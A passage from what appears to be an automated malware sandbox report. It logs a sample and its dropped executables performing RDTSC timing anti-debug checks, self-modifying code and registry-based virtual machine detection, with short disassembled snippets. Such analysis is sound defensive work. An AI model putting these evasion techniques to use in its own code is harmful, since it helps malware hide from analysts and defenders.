                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90DC2 second address: 4C90E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov cx, 8E0Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d movzx eax, al 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6968D54746h 0x00000017 and ah, 00000058h 0x0000001a jmp 00007F6968D5473Bh 0x0000001f popfd 0x00000020 mov ecx, 0C07F40Fh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E06 second address: 4C90E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 1127D17 second address: 1127D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 jnp 00007F6968D54736h 0x0000000d jnp 00007F6968D54736h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 1127E95 second address: 1127EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6969412EB9h 0x0000000d rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 1127EB6 second address: 1127EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6968D54736h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 1127EC2 second address: 1127EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 1127EC6 second address: 1127EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6968D54745h 0x0000000f jg 00007F6968D54736h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4029A second address: 4C4029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4029E second address: 4C402A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C402A4 second address: 4C402C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C402C3 second address: 4C402E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C402E0 second address: 4C40329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, FC92h 0x00000007 pushfd 0x00000008 jmp 00007F6969412EB3h 0x0000000d sub ecx, 5F336C8Eh 0x00000013 jmp 00007F6969412EB9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ebx, 268075A2h 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, edi 0x00000027 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B2E9 second address: 112B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B2EF second address: 112B2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6969412EA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40329 second address: 4C4035F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov esi, edx 0x0000000b mov dh, 7Dh 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 jmp 00007F6968D54740h 0x00000015 push FFFFFFFEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007F6968D5473Dh 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4035F second address: 4C40365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B44C second address: 112B452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B452 second address: 112B480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jg 00007F6969412EB3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6969412EADh 0x00000019 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B480 second address: 112B49A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F6968D5473Ch 0x00000014 jnl 00007F6968D54736h 0x0000001a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B49A second address: 112B4D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F6969412EA6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d call 00007F6969412EADh 0x00000012 xor cx, BEC6h 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1246025Ch] 0x0000001e mov edx, dword ptr [ebp+122D2CE3h] 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6969412EADh 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40365 second address: 4C40369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40369 second address: 4C4036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B594 second address: 112B5AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D54738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6968D5473Ch 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4036D second address: 4C40391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F6969412EA9h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6969412EB1h 0x00000014 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B5AF second address: 112B5B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6968D54736h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B5B9 second address: 112B649 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2F3Bh] 0x00000013 mov dword ptr [ebp+122D30EAh], esi 0x00000019 push 00000000h 0x0000001b adc di, 81FBh 0x00000020 mov dword ptr [ebp+122D31B5h], eax 0x00000026 push 75611D31h 0x0000002b push ecx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jno 00007F6969412EA6h 0x00000035 popad 0x00000036 pop ecx 0x00000037 xor dword ptr [esp], 75611DB1h 0x0000003e mov edx, dword ptr [ebp+122D2DD3h] 0x00000044 push 00000003h 0x00000046 push 00000000h 0x00000048 mov esi, eax 0x0000004a push 00000003h 0x0000004c mov edi, dword ptr [ebp+122D2F67h] 0x00000052 call 00007F6969412EA9h 0x00000057 je 00007F6969412EBEh 0x0000005d jng 00007F6969412EB8h 0x00000063 jmp 00007F6969412EB2h 0x00000068 push eax 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F6969412EB3h 0x00000071 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40391 second address: 4C403A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D5473Ch 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B649 second address: 112B666 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F6969412EA6h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B666 second address: 112B66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B66C second address: 112B69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6969412EB5h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6969412EB1h 0x00000016 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B69E second address: 112B6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403A1 second address: 4C403A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B6A4 second address: 112B6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6968D54736h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B6AE second address: 112B6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B791 second address: 112B796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B796 second address: 112B7E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6969412EB9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007F6969412EBEh 0x00000014 push ebx 0x00000015 jmp 00007F6969412EB6h 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jp 00007F6969412EACh 0x00000027 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B7E8 second address: 112B82A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6968D5474Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F6968D54749h 0x00000014 pop esi 0x00000015 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B8D7 second address: 112B8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 112B8DC second address: 112B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1B0E06AAh 0x00000010 mov ecx, ebx 0x00000012 lea ebx, dword ptr [ebp+12460270h] 0x00000018 push esi 0x00000019 movzx edx, bx 0x0000001c pop esi 0x0000001d xchg eax, ebx 0x0000001e push esi 0x0000001f jl 00007F6968D5473Ch 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F6968D5473Ch 0x0000002f jl 00007F6968D54736h 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403A5 second address: 4C40413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6969412EAEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F6969412EABh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov bl, 44h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F6969412EACh 0x00000024 popad 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6969412EB1h 0x00000031 sbb cx, 47A6h 0x00000036 jmp 00007F6969412EB1h 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e mov cl, 2Ah 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40413 second address: 4C40422 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40422 second address: 4C40426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40426 second address: 4C4043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4043D second address: 4C40478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F6969412EB0h 0x0000000c sub eax, 05A36AD8h 0x00000012 jmp 00007F6969412EABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b call 00007F6969412EA9h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40478 second address: 4C4047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4047C second address: 4C40482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40482 second address: 4C40488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40488 second address: 4C4048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4048C second address: 4C404B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D5473Dh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C404B8 second address: 4C404CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C404CD second address: 4C404D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C404D3 second address: 4C4051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F6969412EB4h 0x00000012 mov cx, CE41h 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F6969412EB8h 0x00000021 mov eax, 7E638121h 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4051C second address: 4C405C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F6968D54749h 0x00000012 pop eax 0x00000013 jmp 00007F6968D5473Eh 0x00000018 mov eax, dword ptr fs:[00000000h] 0x0000001e jmp 00007F6968D54740h 0x00000023 nop 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F6968D5473Eh 0x0000002b xor ecx, 6BD19AA8h 0x00000031 jmp 00007F6968D5473Bh 0x00000036 popfd 0x00000037 mov ebx, eax 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c movsx edx, cx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushfd 0x00000042 jmp 00007F6968D5473Ah 0x00000047 xor ah, 00000008h 0x0000004a jmp 00007F6968D5473Bh 0x0000004f popfd 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C405C0 second address: 4C40655 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 5BB4F77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F6969412EB2h 0x00000010 sub esp, 1Ch 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6969412EAEh 0x0000001a sub si, 4298h 0x0000001f jmp 00007F6969412EABh 0x00000024 popfd 0x00000025 mov dx, si 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F6969412EB2h 0x0000002f push eax 0x00000030 jmp 00007F6969412EABh 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F6969412EB6h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6969412EB7h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40655 second address: 4C406A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F6968D54746h 0x00000015 jmp 00007F6968D54745h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D64F61 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DCA645 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 1174F61 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 11DA645 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSpecial instruction interceptor: First address: 83FC6E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSpecial instruction interceptor: First address: 83FB7D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSpecial instruction interceptor: First address: 9E4AB0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSpecial instruction interceptor: First address: A72DFE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSpecial instruction interceptor: First address: 9E46FC instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSpecial instruction interceptor: First address: 81CA7C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSpecial instruction interceptor: First address: 9B9AC9 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSpecial instruction interceptor: First address: 9B8A37 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeSpecial instruction interceptor: First address: 9B85F0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSpecial instruction interceptor: First address: 957B7B instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSpecial instruction interceptor: First address: 9550BE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSpecial instruction interceptor: First address: AFE5A5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSpecial instruction interceptor: First address: B84384 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSpecial instruction interceptor: First address: 116F9B7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeSpecial instruction interceptor: First address: 133ED83 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04C90C79 rdtsc 0_2_04C90C79
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 4732Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 3548Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2238
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4433
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4763
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2825
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow / User API: threadDelayed 1175
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow / User API: threadDelayed 1169
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow / User API: threadDelayed 1207
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow / User API: threadDelayed 1187
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeWindow / User API: threadDelayed 1193
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow / User API: threadDelayed 1269
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow / User API: threadDelayed 1264
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow / User API: threadDelayed 1137
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow / User API: threadDelayed 1246
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeWindow / User API: threadDelayed 1261
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1234
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1195
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1245
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1227
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1223
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1235
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1237
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeWindow / User API: threadDelayed 1225
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exeJump to dropped file
